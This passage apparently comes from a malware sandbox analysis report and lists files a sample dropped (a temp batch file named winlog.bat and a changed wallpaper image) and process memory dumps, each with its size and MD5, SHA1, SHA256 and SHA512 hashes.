                                                SHA1

                                                d3f8921fc0c69e539b6f9b7c9730c5651a35c90c

                                                SHA256

                                                006e1097ef36cf53b1eed7bfe0a9e422445211042e2d912c54c4c5396b8ff547

                                                SHA512

                                                9ba777ef9fb020aa10efc029757b0f3fe3db02041f34ce7092c324c1eadddc08fb255dc60a2cd7f4ac9ac8e35d368ea87c54dd81aa79bef7bd904b4e3c539d28

                                              • C:\Users\Admin\AppData\Local\Temp\winlog.bat

                                                Filesize

                                                134B

                                                MD5

                                                e2f5e009e62deb9b97d3629fa2920105

                                                SHA1

                                                0704f071adac1f427ab4b977a95260889f526f1c

                                                SHA256

                                                6879c105f51890e29934bea83794b0035eedf03a67ada5e098e23ff0e81b46bc

                                                SHA512

                                                d40207a3c7edd897dcb98a0545a39492f52b4042d5c75936707f104f1b5a50491088ab0425f7498397ed0af09e308a0375b986543783d13f6048580029ef0aed

                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg

                                                Filesize

                                                12KB

                                                MD5

                                                0ad0c474db8f24a7c58d7b76e3b08e2e

                                                SHA1

                                                324271930e8c8c6d970fea0d8cc5f888ff3b4d5d

                                                SHA256

                                                5684a132344756d1d5feac935fd898c5a451e1895680c86510ea40bd5fa4b331

                                                SHA512

                                                920a54787d5d568ba75c349caae3f7a80739ee8c85675f2f732f763abbb4bc659fb8fe764e84687b9f892b23a473eb96375a6b3a92d8987ca48d75313160fba4

                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg

                                                Filesize

                                                12KB

                                                MD5

                                                0ad0c474db8f24a7c58d7b76e3b08e2e

                                                SHA1

                                                324271930e8c8c6d970fea0d8cc5f888ff3b4d5d

                                                SHA256

                                                5684a132344756d1d5feac935fd898c5a451e1895680c86510ea40bd5fa4b331

                                                SHA512

                                                920a54787d5d568ba75c349caae3f7a80739ee8c85675f2f732f763abbb4bc659fb8fe764e84687b9f892b23a473eb96375a6b3a92d8987ca48d75313160fba4

                                              • memory/3348-158-0x0000000005C20000-0x0000000006248000-memory.dmp

                                                Filesize

                                                6.2MB

                                              • memory/3348-160-0x0000000006250000-0x00000000062B6000-memory.dmp

                                                Filesize

                                                408KB

                                              • memory/3348-161-0x00000000062C0000-0x0000000006326000-memory.dmp

                                                Filesize

                                                408KB

                                              • memory/3348-163-0x0000000008260000-0x00000000088DA000-memory.dmp

                                                Filesize

                                                6.5MB

                                              • memory/4840-162-0x0000000006100000-0x000000000611E000-memory.dmp

                                                Filesize

                                                120KB

                                              • memory/4840-156-0x0000000002C20000-0x0000000002C56000-memory.dmp

                                                Filesize

                                                216KB

                                              • memory/4840-159-0x0000000005260000-0x0000000005282000-memory.dmp

                                                Filesize

                                                136KB

                                              • memory/4840-164-0x0000000006800000-0x000000000681A000-memory.dmp

                                                Filesize

                                                104KB